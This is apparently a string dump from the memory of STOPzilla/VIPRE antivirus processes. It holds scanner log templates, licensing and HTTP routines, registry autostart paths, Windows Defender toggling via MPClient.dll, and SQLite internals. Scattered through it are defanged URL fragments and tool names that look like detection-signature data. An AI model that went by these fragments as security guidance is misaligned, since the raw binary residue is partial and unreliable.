Set SBCS_OPT_SCAN_FILENAME_AND_CHECKSUM to <%d>.
Failed setting SBCS_OPT_SCAN_FILENAME_AND_CHECKSUM <%d>. Leaving now.
Set SBCS_OPT_SCAN_DONT_CALC_CHECKSUM to <%d>.
Failed setting SBCS_OPT_SCAN_DONT_CALC_CHECKSUM <%d>. Leaving now.
Set SBCS_OPT_SCAN_DERIVATIVES to <%d>.
Failed setting SBCS_OPT_SCAN_DERIVATIVES <%d>. Leaving now.
set SBCS_OPT_SCAN_COOKIES to <%d>
Failed setting SBCS_OPT_SCAN_COOKIES <%d>. Leaving now.
Set SBCS_OPT_SCAN_COMMON_TACTICS to <%d>.
Failed setting SBCS_OPT_SCAN_COMMON_TACTICS <%d>. Leaving now.
Set SBCS_OPT_SCAN_ARCHIVES to <%d>.
Failed setting SBCS_OPT_SCAN_ARCHIVES <%d>. Leaving now.
Set SBCS_OPT_SCAN_ALL_USERS to <%d>.
Failed setting SBCS_OPT_SCAN_ALL_USERS <%d>. Leaving now.
Set SBCS_OPT_EXCLUDE_REMOVABLE_DRIVES to <%d>.
Failed setting SBCS_OPT_EXCLUDE_REMOVABLE_DRIVES <%d>. Leaving now.
Set SBCS_OPT_SCAN_ALL_LOCAL_DRIVES to <%d>.
Failed setting SBCS_OPT_SCAN_ALL_LOCAL_DRIVES <%d>. Leaving now.
Set SBCS_OPT_RECURSIVE_FILE_SCAN to <%d>.
Failed setting SBCS_OPT_RECURSIVE_FILE_SCAN <%d>. Leaving now.
Set SBCS_OPT_KEEP_SCAN_RECORD to <%d>.
Failed setting SBCS_OPT_KEEP_SCAN_RECORD <%d>. Leaving now.
Thread priority successfully set to <%d>.
Failed setting thread priority to <%d>. Still applying other settings.
Scan type <%d> successfully applied to Threat Engine.
Couldn't set scan description <%s>. Still applying other settings to Threat Engine.
%d - %s, %d - %s
Found settings for scan type <%d>.
Did not find scan schedule to get scan settings from for this Scheduled Custom Scan <%d>. Leaving now.
Did not find settings for scan type <%d>. Leaving now.
Set SBCSSetLowRiskThreatDetection() to <%s>.
Failed setting SBCSSetLowRiskThreatDetection(<%s>). Value may be incorrect in the threat engine.
%s initialized loop. Scan will %s
Removing missed scheduled scan item after its timer was fired. Scan name [%s], Id [%d], start time [%s].
Looking for missed scheduled scan items to remove. Scan name [%s], Id [%d], start time [%s], now [%s].
Scanner returned unknown state <%d>. Scan ends and thread waits for the next event.
Scan executed successfully, user feedback is expected.
A scan was executed successfully and no threats were found. Performing the clean to set the clean results and fire the appropriate events.
The system is configued to perform cleaning without user dispositioning of threats found. Results file is <%s>.
Last scan type <%d> SAVED. Wait for the next event.
Couldn't save last scan type <%d>. Wait for the next event.
Config data for scan type <%d> SAVED. Wait for the next event.
Couldn't save config data for scan type <%d>. Wait for the next event.
Saved scan results file <%s>.
Couldn't save scan results into <%s>. Scan ends and thread waits for the next event.
%Y%m%d%H%M%S.xml
Config data for the next scheduled scan date/time SAVED. Proceed with scan operation.
Couldn't save the next scheduled scan date/time. Proceed with scan operation.
CSBScanControlImpl::ExecuteScanner
Added a new missed scheduled scan to the schedules collection with start time of [%s]. Persisting silently to the scan config file.
Last scheduled scan was missed, schedule a one time scan in %d minutes.
We missed a scheduled scan. The action to take is %d.
Checking to see if we missed a scheduled scan. Next scheduled scan is [%s].
Thread initialization failed. Cannot execute clean, will wait for the next one.
It's NOT valid to execute a clean operation, but no threats were found. Proceed with cleaning process in order to advance the state of the scan controller.
It's VALID to execute a clean operation. Proceed with cleaning process.
It's INVALID to executed a clean operation. Abort the cleaning process.
Unexpected scan type [%d] updating system event log. Will wait for the next event.
Thread initialization failed. Cannot execute scan, will wait for the next one.
Scan thread is waiting for event, current state is <%d>.
Couldn't create scan thread, scan operations will not happen.
Pre-loop actions executed successfully. Procced with scan thread execution.
Failed executing action taken BEFORE starting loop. Scan thread will end now.
Scan thread already running. Leaving operation now!
%s:%s
SBWinHttp
Failed opening session with proxy: proxy server=%s
SBWinHttp::CSBWinHttpSession::Initialize
Opened session with proxy: proxy server=%s
Failed opening connection: server=%s, port=%d
SBWinHttp::CSBWinHttpConnection::Initialize
Opened connection: server=%s, port=%d
Got unexpected WINHTTP_CALLBACK_STATUS_xxx. Status code: %d
Got WINHTTP_CALLBACK_STATUS_REQUEST_ERROR. dwResult=%d dwError=%d
OnReadComplete returned: %d
Completed sending request. WinHttpReceiveResponse returned error: %d
Error after sending request. OnWriteDAta returned: %d
SBWinHttp::CSBWinHttpRequest<class SBWinHttp::CSBTransferBufferRequest>::OnCallback
Request returned %d
Unable to send the user credentials to the Web service.
WinHttpSetCredentials failed GetLastError returned [%d].
Request returned HTTP_STATUS_PROXY_AUTH_REQ.
Request returned HTTP_STATUS_NOT_FOUND.
Request returned HTTP_STATUS_BAD_REQUEST.
Request returned HTTP_STATUS_SERVICE_UNAVILABLE
SBWinHttp::CSBWinHttpRequest<class SBWinHttp::CSBTransferBufferRequest>::OnHeadersAvailable
VIPREHttpServer::CSBHttpMonitor::SendHttpResponse
HttpSendHttpResponse failed with %lu
HttpReceiveRequestEntityBody failed with %lu
VIPREHttpServer::CSBHttpMonitor::SendHttpPostResponse
VIPREHttpServer::CSBHttpMonitor::DoReceiveRequests
[Error %u, %s].
%s\%s*.csv
%s%s_%d.csv
d-d-d d:d:d
\\.\root\SecurityCenter
pathToSignedProductExe
FirewallProduct.instanceGuid="
AntiVirusProduct.instanceGuid="
AntiSpywareProduct.instanceGuid="
Cancelled waitable timer for item <%d>.
Cancel of waitable timer failed for item <%d>. Timer may still be set.
Deleting schedule item <%d> object.
Closing timer handle 0xX.
Sun - Sat [%d, %d, %d, %d, %d, %d, %d]
Created waitable timer; handle 0xX.
Waitable timer already exists; here is the handle 0xX.
Setting waitable timer for %I64d 100 nano second units in the future which is %s (local time).
Randomizing timer by %I64u 100ns units, %d seconds.
Scheduling item <%d> for %s. Time d:d, Day %s, Days: %s.
Looking for next week schedule items. Checking schedule item <%d>. Time d:d, Days: %s.
Deleting expired one time schedule. Schedule item <%d>. Time d:d, Days: %s.
Looking for this week schedule items. Checking schedule item <%d>. Time d:d, Days: %s.
Looking for next schedule item. Today is %s. Day of week as int = %d.
%m/%d/%y Day %A, %H:%M.
Potentially too small of a repeat interval caused adding of max number of schedules. Truncating to max schedules. Repeat interval %d minutes.
Added schedule item <%d> object. Start d:d.
Malformed stop time passed in <%s>. Rejecting this schedule.
Malformed time passed in <%s>. Rejecting this schedule.
Maximum count [50] of scheduled items exceeded for itemData <%d>. Rejecting this schedule.
Added schedule item <%d> object.
okernel32.dll
Unable to locate the WDStatus and WDEnable functions in the MPClient.dll.
Request to (%s) Defender failed hr = <%x>.
Request to (%s) Defender processed successfully.
Request was to (%s) and Defender is already (%s).
Load of MPClient.dll failed. Defender not installed on this system.
\Windows Defender\MpClient.dll
Invalid source buffer pSourceBuff=[0x%x], dwSourceLen=[%d]. Crypt will abort now.
Invalid target buffer pTargetBuff=[0x%x], pdwTargetLen=[0x%x]. Crypt will abort now.
There is no valid key handle=[0x%x]. Crypt will abort now.
There is no valid key string set. Crypt will abort now.
Couldn't encrypt/decrypt data using key=[%s]. Crypt failed.
Couldn't create block cypher session basd on hash of key=[%s]. Crypt will abort now.
Couldn't populate cryptographic hash object using key=[%s]. Crypt will abort now.
Invalid target buffer ppTargetBuff=[0x%x], pdwTargetLen=[%d]. Crypt will abort now.
Successfully retrieved file size <%d>.
Got source data <0x%x> and size <%d> from path <%s> successfully.
Coulnd't read file size on path <%s>. Crypt will abort now.
Invalid source path string length=[%d]. Crypt will abort now.
Wrote all data into file <%s>.
Unexpected size written into file %s.
Failed writing data into file %s.
Couldn't open file %s.
Could not write RegInfo registry key, error [%ld].
Could not open SBAMSvc registry key, error [%ld].
SKMSRegistration::WriteRegistrationKeyToRegistry
Could not open HKLM\Software registry key.
Could not read RegInfo registry key.
SKMSRegistration::ReadRegistrationKeyFromRegistry
Could not open HKLM\Software\SBAMSvc registry key.
Could not read MachineGuid registry key.
Could not open HKLM\Software\Microsoft\Cryptography registry key.
InstallEXEName
InternetReadFile successful. SKMS Return Value = %s.
Error getting SKMS status code from skms. Registration key will not be able to be verified.
Error getting install date from SBAMConfig.bin
Error writting install date to SBAMConfig.bin
Invalid date from SBAMConfig.bin
Error getting data from SBAMConfig.bin. Date is in the future, resetting to now.
SBAMConfig.bin exists
Query for operating system name failed.
Failed to Create the Web Object
Error getting SKMS status code from skms, it return an empty string. Registration key will not be able to be verified.
Unique Key = %s
Validating Registration Code: %s
Didn't receive a registration key from SKMS. Will try again on next attempt.
The Registration code returned by SKMS did not validate as a registration key. This data will not be used.
Request to SKMS for a trial key returned success, will attempt to validate that this looks like a valid key. SKMS Returned = (%s).
The request to SKMS was unable to AutoGet Registration key. Will try again on next attempt.
SKMSRegistration::AutoGetRegistrationKey
?KEYVALUE=
kbu.dat
Proxy is enabled, using server name (%s).
WinHttpOpen failed error [%d]. Proxy server name is (%s). Returning false.
Leaving SBInternetAccess after WinHttpOpen returning false.
WinHttpOpen returned valid handle, checking request url <%s>.
hXXps://
Invalid RequestURL (%s) unable to retrieve server name.
Invalid RequestURL (%s) unable to retrieve application request name.
WinHttpConnect to <%s> failed error [%d]. Request not performed.
Leaving SBInternetAccess after WinHttpConnect returning false.
WinHttpConnect to <%s> successful.
WinHttpOpenRequest of <%s> failed error [%d]. Request not performed.
Leaving SBInternetAccess after WinHttpOpenRequest returning false.
WinHttpOpenRequest <%s> successful.
WinHttpSendRequest returned [%s] GetLastError returned [%d].
WinHttpReceiveResponse returned [%s] GetLastError returned [%d].
error = ERROR_WINHTTP_RESEND_REQUEST, so resending request...
A WinHttp* call returned an error, GetLastError returned [%d].
WinHttpQueryHeaders returned [%s].
Received HTTP_STATUS_SERVICE_UNAVAIL response to WinHttpQueryHeaders.
Received HTTP_STATUS_OK response to WinHttpQueryHeaders.
Received HTTP_STATUS_PROXY_AUTH_REQ response to WinHttpQueryHeaders. The proxy requires authentication. Sending credentials.
GetLastError = [%d] calling WinHttpQueryAuthSchemes during Proxy Authentication processing.
Status code [%d] returned from WinHttpQueryHeaders while reading response from web service.
WinHttpQueryHeaders returned status [%d], GetLastError = [%d]
WinHttpQueryDataAvailable returned [%d] bytes available to read.
Reading the data into file <%s>.
WinHttpReadData() error <%d>. Download not completed successfully.
Open of download file <%s> failed with error [%d]. Download not performed.
Closed download file, [%d] total bytes downloaded.
Returning buffer data (%S).
Progress call back indicated cancel download. Deleting partial download file <%s>.
Caught an exception error [%d] trying to get data from internet. Request not performed.
Leaving SBInternetAccess returning [%s].
Request URL is empty. Unable to request data from internet server.
SBAMInternetAccess::SBPostURLReadResult
SBPostURLReadResult Request URL is (%s).
SBAMInternetAccess::SBPostURLSaveToFile
Request URL is empty. Cannot request data from internet server.
SBPostURLSaveToFile Request URL is (%s).
z:\lmx\sw\lmx-0050\lmxparse.h
lmxparse.cpp
l_event != EXE_UNKNOWN
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
w.bat
WUSER32.DLL
!#%*,/:;?@[]__{{}}
!#%'**,,./:;?@\\
$$ <>^^``||~~
<>||~~
tnft_temp.zip
hXXp://dbteam_testbox/ThreatNetResTService/SendFileService.svc/ThreatNetTransferFile?
sFilePath: <%s>; sURL: <%s>; sPassword: <%s>
Error deleting zip file: <%s>
File <%s> is too large to transfer to ThreatNet. Unable to transfer file to Threatnet.
COM error: <0xx> Description: <%s>.
Args: sFilePath: <%s>; sURL: <%s>; sPassword: <%s>
Error %d. Unable to open file: <%s>. File(s) will not be transfered to ThreatNet
GetZipFile Args: sZipPathFileName: <%s>; iFileLength: <%d>
COM error: <0xx> Description: <%s>. Unable to transfer file to ThreatNet.
Xceed error: <%d>. Unable to transfer file to ThreatNet.
ZipFiles Args: sBasePath: <%s>; sFilesToProcess: <%s>; sZipPathFileName: <%s>; sPassword: <%s>
The file is read only. Unable change file attributes for %s <%s>.
Error saving %s <%s>--%s
Failed to save %s <%s>.
Bad argument; pFilePath is NULL. %s.
Error reading %s <%s>--%s
Failed to read %s <%s>.
r4.0.0
Couldn't resolve path=<%s>.
Couldn't get file info from path=<%s>. Go to next item.
Couldn't get value from [hive:key:value]=[0x%x:%s:%s]. Leave now.
Couldn't resolve path=<%s>. Go to next item.
Got valid class path [%s] from [hive:key:value]=[0x%x:%s:%s].
Couldn't traverse for SUBKEYS under [hive:key]=[0x%x:%s]. Proceed normally.
Couldn't traverse for VALUES under [hive:key]=[0x%x:%s]. Proceed normally.
Couldn't access subkeys nor values under registry location [hive:key]=[0x%x:%s]. Returning now.
Couldn't find any ClsIds on registry location [hive:key]=[0x%x:%s]. Returning now.
Couldn't get path from ClsId=<%s>. Go to next item.
No Clsid paths were found under [hive:key]=[0x%x:%s].
Got Clsid paths under [hive:key]=[0x%x:%s] successfully.
Couldn't traverse for ClsId paths under [hive:key]=[0x%x:%s]. Returning now.
Couldn't resolve path=<%s>. Proceed normally.
Couldn't get file info from path=<%s>. Proceed normally.
No Clsid info were found under [hive:key]=[0x%x:%s].
Got Clsid info objects under [hive:key]=[0x%x:%s] successfully.
software\microsoft\windows\currentversion\explorer\browser helper objects
Couldn't get the BHOs under HKEY_LOCAL_MACHINE.
Couldn't get the BHOs under HKEY_CURRENT_USER.
%sClsIds were found under the BHO registry location.
Couldn't get ActiveX objects under HKEY_LOCAL_MACHINE.
Couldn't get ActiveX objects under HKEY_CURRENT_USER.
%sClsIds were found under the Active X registry location.
software\microsoft\windows\currentversion\explorer\shellexecutehooks
Couldn't get ShellExecHooks under HKEY_LOCAL_MACHINE.
CSBExplorer::GetShellExecHookColl
Couldn't get ShellExecHooks under HKEY_CURRENT_USER.
%sClsIds were found under the windows shell execute registry location.
Couldn't get Shell Execution Hooks.
CSBExplorer::GetShellExecHooks
Got info from no Shell Execution Hook.
Got all Shell Execution Hooks info successfully.
Couldn't get ip address from input string [%s].
Couldn't get host information from Ip address [%s].
There is no server name for Ip address [%s].
Buffer for host name is not big enough iLen=[%d], strRemoteHost=[%s].
It failed in getting info from file path [%s]. Leave now.
Couldn't get host name from ip address [%s]. Go to next item.
GetModuleFileNameEx failed [%u]
Invalid start up type eType=[%d].
Couldn't get list of files under path=[%s].
desktop.ini
Couldn't get shortcut info path=[%s] or it's not a shortcut. Proceed normally.
Couldn't resolve path to file pointer by shortcut path=[%s]. Go to next file.
Couldn't get file info path=[%s]. Proceed normally.
software\microsoft\windows\currentversion\run
Invalid start up type eType=[%d].Leave now.
Registry location empty eType=[%d]. Leave now.
Couldn't get file path from command strCmd=[%s].Go to command.
Couldn't get file info path=[%s].Proceed normally.
software\microsoft\windows nt\currentversion\winlogon
Invalid start up type eType=[%d]. Leave now.
Got empty string on registry location [hive:key:value]=[0x%x:%s:%s]. Leave now.
Couldn't get file path from registry location [hive:key:value]=[0x%x:%s:%s]. Go to next item.
Couldn't resolve path to file path=[%s]. Go to next item.
There is no Windows logon to get info from.
Got info from all Windows logon programs successfully.
Couldn't find host file on location paht=[%s].
Successfully got path to host file paht=[%s].
Couldn't open hosts file on path=[%s]. Leave now
Couldn't memory to get data from file path=[%s]. Leave now
Failed reading data from hosts file path=[%s]. Leave now.
Push data host into collection [HostName:IpAddr]=[%s:%s]
Couldn't get wisock version from registry location [hive,key,value]=[0x%x:%s]. Leave now.
Got wisock version from registry location [hive,key,value]=[0x%x:%s] successfully.
Found no subkeys under [hive,key]=[0x%x:%s]. Returning now.
Got no data from registry location [hive:key:value]=[0x%x:%s:%s]. Go to next item.
Got registry binary value successfully from [hive:key:value]=[0x%x:%s:%s]. Proceed normally.
Unknown value type queried from registry location [hive:key:value]=[0x%x:%s:%s]. Go to next item.
Couldn't query value from registry location [hive:key:value]=[0x%x:%s:%s]. Go to next item.
mswsock.dll
rsvpsp.dll
Couldn't resolve path=[%s]. Go to next item.
Couldn't get file info from path=[%s]. Go to next item.
Got version info, dwInfoSize=[%d] and pInfoBuff=[0x%p].
Unexpected file version data structure size, uiDataLen=[%d]. Leave now.
XX
FileVersion = <%s>
CompanyName = <%s>
ProductName = <%s>
SpecialBuild = <%s>
InternalName = <%s>
PrivateBuild = <%s>
FileDescription = <%s>
ProductVersion = <%s>
LegalCopyright = <%s>
LegalTrademarks = <%s>
OriginalFileName = <%s>
Couldn't open file to calculate the MD5, errno = %d, strPath = %s.
Couldn't set mode to file, errno = %d, strPath = %s.
Source file path must be a valid full path, strPath=<%s>. Leave now.
Couldn't calculate the MD5, strPath=<%s>. Proceed normally now.
Couldn't get version information from file strPath=<%s>. Proceed normally now.
Couldn't open file, strPath=<%s>. Proceed normally now.
Couldn't get file times, strPath=<%s>. Proceed normally now.
Windows
Operating System
(Export Version)
Calculated non-version file info successfully, strPath=<%s>.
Path to file [%s] found on [%s].
Invalid file name [%s].
inetinfo.exe
Path to file [%s] NOT found.
Path to file in the registry [%s] found on [%s].
Invalid command string path strCmd=[%s].
CSBFileSystem::ResolveCmdLine
%1\"" %*
""%1"" %*
Got valid full path for strResolvedCmd=[%s].
Got valid full path for strResolved=[%s].
Got valid full path strResolved=[%s].
Invalid file path or name [%s]
Invalid directory path [%s]
Couldn't test folder existance [%s].
Folder existance tested successfully [%s].
Invalid path [%s]
Skipping default directories under [%s]
Couldn't traverse all files under [%s]
Directory doesn't exist [%s].
Failed getting info of all files under path=[%s].
Got info of all files under path=[%s].
Failed to get files under directory path=[%s].
Current file to get info from [%s].
File doesn't exist path=[%s].
Couldn't get hive handle: Hive:Key=[0x%x:%s].
Couldn't get hive handle: Hive:Key:Value=[0x%x:%s:%s].
Couldn't get registry key: Hive:Key:Value=[0x%x:%s:%s].
No buffer nor size for data : pbvData = 0x%p, dwSize = %d.
No size for data buffer : pbvData = 0x%p, dwSize = %d.
Get registry value : Hive:Key:Value=[0x%x:%s:%s].
Registry value successfully queried: Hive:Key:Value=[0x%x:%s:%s].
Registry value size successfully queried: Hive:Key:Value=[0x%x:%s:%s], dwDataSize = %d.
Got no data from registry location [hive:key:value]=[0x%x:%s:%s]. Leave now.
Got registry string successfully, strData=%s : Hive:Key:Value=[0x%x:%s:%s].
CSBRegistry::EnumRegistrySubkeyColl
Enumerate all subkeys under a given key : Hive:Key=[0x%x:%s].
Got subkey [index=%d, name=%s] successfully from: Hive:Key=[0x%x:%s].
Failed enumerating subkeys from: Hive:Key=[0x%x:%s].
Couldn't get registry key: Hive:Key=[0x%x:%s].
Invalid value or data sizes, dwValue=%d, dwData=%d : Hive:Key=[0x%x:%s].
Found the value [%s] under [hive:key]=[0x%x:%s] successfully.
Failed enumerating values from: Hive:Key=[0x%x:%s].
Found [%d] values under [hive:key]=[0x%x:%s] successfully.
No values were found under [hive:key]=[0x%x:%s] successfully.
gAdvapi32.dll
Got process dwPID=[%d] file path [%s].
Couldn't get file name on process id [%d] to get its path.
Couldn't open process id [%d] to get its path.
Couldn't get module handle from process PID[%d]
Couldn't get info from module handle from process PID[%d]
Unable to set platform info platform ID<%d>, BuildNo<%d> MajorVersNo<%d> MinorVersNo<%d> ServicePackInfo<%*.*s>
SHGetFolderPath API call failed when getting CSIDL <%d>
SHGetSpecialFolderPath API call failed when getting CSIDL <%d>
Got CSDIL path <%s> successfully
Failed to expand environment strings <%s>
Source string <%s> is too big when expanded <%d>
Source string <%s> expanded to <%s>
Couldn't get registry data value from registry location [hHive:Key:Value]=[%d:%s:%s]. Leave now.
Couldn't expand any environment variables on <%s>
%SYSTEMDIRECTORY%
%SYSTEM%
%SYSTEMROOT%
%WINDOWS%
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELL FOLDERS
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ACTIVEX CACHE
%DOWNLOAD_PROGRAM_FILES%
%STARTUP%
%COMMON_STARTUP%
%COOKIES%
%DESKTOPDIRECTORY%
%FAVORITES%
%STARTMENU%
%COMMON_STARTMENU%
%COMMON_PROGRAMS%
%COMMON_FAVORITES%
%COMMMON_ALTSTARTUP%
%COMMON_DESKTOPDIRECTORY%
%COMMON_APPDATA%
%DEFAULT_STARTUP%
%DRIVERS_ETC%
Got full path <%s> from abreviated path <%s>
Couldn't find full path for abreviated path <%s>
Failed getting file path for the shell link object, hr=[%d].
Failed getting description for the shell link object, hr=[%d].
Couldn't find shell link object shortcut, hr=[%d].
Couldn't open shell link object shortcut, hr=[%d].
Assertion failed: %s, file %s, line %d
74.0.0
7.0.0.4
%Program Files% (x86)\STOPzilla\SBAMSvc.exe
SBAMSvc.exe
SBAMSvc.exe_3448_rwx_00D60000_00001000:
.edata
.rsrc
.rdata
.debug
.idata
.reloc
SBAMSvc.exe_3448_rwx_00D90000_00004000:
gmer.dllGMERgmer.exe -l.text
.rsrc
.data
.rdata
checkpoint.com
\\.\PrimaxPointingDeviceFilterSoftware\Primax\Mouse Suite 98.text
.reloc
.idata
hXXp://tufei
03.ho
4u.ch
SET RESCUEAPP_MAJOR=%d
SET RESCUEAPP_MINOR=%d
.text
pexcel.jar
pocketword.jar
xmerge.jar
clasOpenOffice.org Calc
OpenOffice.org Calc XML Document
{C6AB3E74-9F4F-4370-.reloc
ADVAPI32.dll
USER32.dll
KERNEL32.dll
COMCTL32.dll
WhatsUp-Setup.exe
.rsrc.data.rdata.textPEMZ
techinline.com
idlecrawler.com
support@fixila.com
WEB PICK - INTERNET HOLDINGS LTD
Webroot Inc.
ComboFix.exe
14.3.1.53697
.ndata
icuuc40.dl
Winlogon.exe
%SYSTEM%\Winlogon.exe
masswatermark.com
SBAMSvc.exe_3448_rwx_00DA0000_00006000:
<%@ ControlMasterImport Namespace
Mimetype_mscab found type %d
STOPzilla.exe_3836:
.text
`.rdata
@.data
.rsrc
@.reloc
t.jTj
t.jtj
t.jpj
u.PPh
t.jHj
t.jhj
t.jLj
t.jPj
uO8^ItJSSh7
8SQLi
u.hp{
f;F.sA
f;H.sA
L$4f;P.sF3
.6.78.9:;
B.CDEFFG
FUu.AUu FUu
pt.Vot/vptClpt
setting_smtp
email_advanced_error_port
cleaner_option_report
scan_month_select_day_%d
scan_day_select_day_%d
<\>.ZH
theme.dialogs.dialog(descriptor:
license_instance_key
support_phone_demo
support_phone_expired
support_phone_full
support_phone_suspended
support_phone_free
support_phone_current
pipe.closed
setting.app.direct3d
option_flag_enforcer_execution
action_support
support_back
support_action_chat
support_action_web
support_action_email
support_action_phone
support_value_instance
page_support
scan.results_xml
options_support_instance_copy_failed
options_support_instance_copied
setting.app.show-splash
scheduled.phone-home.get.vipre-targets
settings.app.battery-power
setting.app.notify-detected-threats
settings.scan.root-kits
settings.scan.low-priority
settings.scan.update
settings.scan.archives
settings.scan.low-severity
settings.scan.auto-clean
settings.scan.cookies
settings.scan.removable
theme.dialogs.dialog(descriptor:dialog_options)
nag.demo.next_nag
nag.expired.next_nag
nag.suspended.next_nag
nag.subscription.next_nag
activate_key_1
activate_key_2
activate_key_3
activate_key_4
activate_key_%d
activate_result_key_invalid
activate_result_key_inactive
external.reseller_id
theme.dialogs.dialog(descriptor:dialog_splash)
SQLite format 3
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYWITHOUTERELEASEATTACHAVINGROUPDATEBEGINNERECURSIVEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTRIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
3.8.8.3
CREATE TEMP TABLE sqlite_temp_master(
</%s>
<!--%s-->
<?%s?>
<!%s>
operator >> (CSZVinaryData& failure
last-execute-time
last-execute-result
last-execute-result-text
stored-action.saved
never-executed
CSZStoredAction::Execute
pipe-name
CSZApplicationPipeClient::_Execute
CSZApplicationPipeClient::GetWrapper
CSZApplicationPipeClient::OnPacket
stored-action.deleted
external.edition
external.product
external.downloader_id
external.affiliate_id
Support
CSZHomeServiceLicense::ExtractSupport
CSZHomeServiceComponentResult::ParseTokenKey
CSZAppDB::ExecuteMigrationCode
CSZApplicationPipeServer::Reply
key-inactive
key-invalid
key-mismatch
key-in-use
SMTPErrorString
CloseEmailWindowMsg
BadUrlCheckingEnabled
BadUrlReplacementText
WindowsLiveMailClientEnabled
BadUrlActionEnum
Port
MsgID
RegKey
BaseURL
LogToWindowsEventLog
Password
custom.all-drives
custom.ignore-removable
custom.known-file-types
custom.processes
custom.cookies
custom.registry
custom.deep-processes
custom.derivatives
custom.all-users
custom.archives
custom.root-kits
custom.path.
custom.common-tactics
theme.assets
ds_noidlemsg
lbs_wantkeyboardinput
es_password
lvs_report
CSZHttpContentHandler::StatusCode
CSZHttpContentHandler::ContentLength
CSZHttpContentHandler::ReceiveContent
CSZHttpContentHandler::CompleteContent
CSZHttp::Request
CSZHttp::ReportStatusCode
CSZHttp::ReportContentLength
CSZHttp::ReportComplete
CSZHttp::ReportContent
CSZSQLDatabase::ExecuteSQL
CSZSQLDatabase::CompileSQL
SQLITE_
d:d:d
d-d-d
d-d-d d:d:d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
os_win.c:%d: (%lu) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s%c%s
recovered %d pages from %s
recovered %d frames from WAL file %s
cannot limit WAL size: %s
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
invalid page number %d
2nd reference to page %d
freelist leaf count too big on page %d
Page %d:
%d of %d pages missing from overflow list starting at %d
failed to get page %d
On tree page %d cell %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Page %d is never used
Fragmentation of %d bytes reported as %d on page %d
unknown database %s
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
%s(%d)
MJ collide: %s
-mjX9X
%s-mjXXXXXX9XXz
MJ delete: %s
FOREIGN KEY constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
FOREIGN KEY
%s constraint failed
cannot open savepoint - SQL statements in progress
abort at %d in [%s]: %s
%s constraint failed: %s
cannot commit transaction - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
database table is locked: %s
statement aborts at %d: [%s] %s
cannot change %s wal mode from within a transaction
cannot open value of type %s
cannot open table without rowid: %s
cannot open view: %s
cannot open virtual table: %s
indexed
cannot open %s column for writing
no such column: "%s"
foreign key
misuse of aliased aggregate %s
%s: %s.%s
%s: %s
%s: %s.%s.%s
%s prohibited in partial index WHERE clauses
%s prohibited in CHECK constraints
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
hex literal too big: %s
%s%.*s"%w"
sqlite_rename_table
%.*s"%w"%s
%s OR name=%Q
sqlite_rename_trigger
sqlite_rename_parent
sqlite_
table %s may not be altered
type='trigger' AND (%s)
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
there is already another table or index with this name: %s
view %s may not be altered
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
sqlite_altertab_%s
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_stat3
sqlite_stat4
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
too many attached databases - max %d
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
unable to open database: %s
database %s is already in use
database %s is locked
no such database: %s
cannot detach database %s
%s %T cannot reference objects in database %s
%s cannot use variables
sqlite_detach
sqlite_attach
access to %s.%s is prohibited
access to %s.%s.%s is prohibited
there is already an index named %s
object name reserved for internal use: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
too many columns on %s
duplicate column name: %s
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
PRIMARY KEY missing on table %s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
CREATE %s %.*s
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
